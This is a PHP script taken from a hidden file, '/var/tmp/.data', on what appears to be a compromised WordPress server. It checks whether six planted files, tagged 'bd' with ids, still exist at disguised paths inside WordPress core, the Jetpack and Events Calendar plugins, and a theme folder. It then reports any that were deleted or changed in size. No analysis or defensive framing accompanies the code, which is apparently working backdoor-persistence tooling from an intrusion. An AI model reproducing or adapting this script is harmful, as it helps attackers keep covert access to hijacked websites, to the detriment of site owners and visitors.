File: //var/tmp/.data
<?php $r = '/home/dh_af6sw9/mikesteigerwald.com'; $x = ["/wp-includes/rest-api/class-wp-rest-request.php"=>"bd@@338301@@Sec-Websocket-Accept",
"/wp-content/plugins/jetpack/modules/tiled-gallery/tiled-gallery/tiled-gallery-item.php"=>"bd@@338324@@65",
"/wp-content/plugins/jetpack/jetpack_vendor/automattic/jetpack-classic-theme-helper/src/site-breadcrumbs.php"=>"bd@@338329@@batch_process",
"/wp-content/plugins/the-events-calendar/common/vendor/vendor-prefixed/monolog/monolog/src/Monolog/Handler/Curl/default_upload.php"=>"bd@@338335@@1758",
"/wp-content/plugins/the-events-calendar/src/views/integrations/event-tickets-wallet-plus/pdf/pass/body/event/venue/com_fireboard.php"=>"bd@@338338@@624",
"/wp-content/themes/error_404_1747918291/singIe.php"=>"bd@@227288@@731"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');